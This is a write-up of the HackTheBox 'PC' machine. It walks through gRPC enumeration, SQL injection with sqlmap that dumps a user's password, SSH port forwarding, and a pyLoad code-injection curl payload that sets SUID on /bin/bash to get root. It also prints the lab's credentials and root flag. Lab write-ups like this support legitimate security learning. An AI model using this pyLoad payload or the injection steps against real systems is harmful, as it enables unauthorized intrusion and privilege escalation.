HackTheBox | PC
- 7 minsOverview
An easy HackTheBox machine that exploits SQL injection in a gRPC application.
Nmap
nmap -A -T4 10.10.11.214 -Pn -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-08-09 20:04 +01
Stats: 0:03:39 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 56.93% done; ETC: 20:10 (0:02:46 remaining)
Nmap scan report for 10.10.11.214
Host is up (0.098s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
| 256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
|_ 256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
50051/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port50051-TCP:V=7.91%I=7%D=8/9%Time=64D3E4AA%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x06
SF:\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GenericL
SF:ines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x
SF:06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetReq
SF:uest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x
SF:06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPOp
SF:tions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSPR
SF:equest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0
SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPCC
SF:heck,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x
SF:06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVer
SF:sionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\x
SF:ff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0"
SF:)%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\
SF:x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0
SF:\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\
SF:?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0
SF:\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05
SF:\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\
SF:?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff
SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\
SF:0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\
SF:xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08
SF:\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf
SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0
SF:\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf
SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0
SF:\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\
SF:xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0
SF:\0\0\0\0\?\0\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I checked what’s in the port 50051 I found :
![![[Pasted image 20230809201409.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230809201409.png)
First I didn’t know what’s that about, but after some googling I found it’s about gRPC :
gRPC is a modern open-source high performance Remote Procedure Call (RPC) framework. It can efficiently connect services in and across data centers with pluggable support for load balancing, tracing, health checking and authentication.
https://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9
Following the above POC. We will first try to list out the blogs available to us in the target scope :
grpcurl -plaintext 10.10.11.214:50051 list
![![[Pasted image 20230809202020.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230809202020.png)
Now we are able to see that the SimpleApp service is up and running, we will now check about the list of services running on gRPC server :
grpcurl -plaintext 10.10.11.214:50051 list SimpleApp
![![[Pasted image 20230809202240.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230809202240.png)
Now we will create a user using the GRPC UI tool :
./grpcui -plaintext 10.10.11.214:50051
![![[Pasted image 20230809202812.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230809202812.png)
This command will initiate a UI portal on which we can provide our data to login or register a user :
![![[Pasted image 20230809202905.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230809202905.png)
After playing around with the UI interface, I realized that I can request the data using the credentials “admin:admin”.
![![[Pasted image 20230809203400.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230809203400.png)
![![[Pasted image 20230809212926.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230809212926.png)
The blog above gave me a hint about possible SQLi in gRPC :
![![[Pasted image 20230810002455.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230810002455.png)
Then I checked getInfo, which requires the token of the user to work :
![![[Pasted image 20230810001553.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230810001553.png)
I sent the request to Repeater and then save it as req.txt to automatically test against SQLi :
sqlmap -r req.txt --dump
I found the credentials of the user sau : sau : HereIsYourPassWord1431
![![[Pasted image 20230810002005.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230810002005.png)
User flag
I’m in ! Now I can get the user flag :
![![[Pasted image 20230810001948.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230810001948.png)
PE
I checked running services and I found a suspicious port, I decided to do SSH port forwarding to see what’s behind this port :
![![[Pasted image 20230810102352.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230810102352.png)
ssh -L 127.0.0.1:8000:127.0.0.1:8000 sau@10.10.11.214
![![[Pasted image 20230810102306.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230810102306.png)
Found a pyLoad page, I checked if there a POC for that and I found it :
![![[Pasted image 20230810102251.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230810102251.png)
https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65
I changed the payload to add the SUID permission to /bin/bash :
curl -i -s -k -X $'POST' --data-binary $'jk=pyimport%20os;os.system(\"chmod%20u%2Bs%20%2Fbin%2Fbash\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' $'http://127.0.0.1:8000/flash/addcrypted2'
![![[Pasted image 20230810104618.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230810104618.png)
Boom I’m root !
![![[Pasted image 20230810104551.png]]](../../../assets/images/HTBPics/Pasted%20image%2020230810104551.png)
Root flag
bash-5.0# cat /root/root.txt 80c997563bf9af451544f2e71984d3c6
MACHINE PWNED!
And that was it, I hope you enjoyed the writeup. If you have any questions you can Contact Me.
Happy Hacking!
Hicham Ouardi
Cybersecurity Engineer | Offensive Security Intern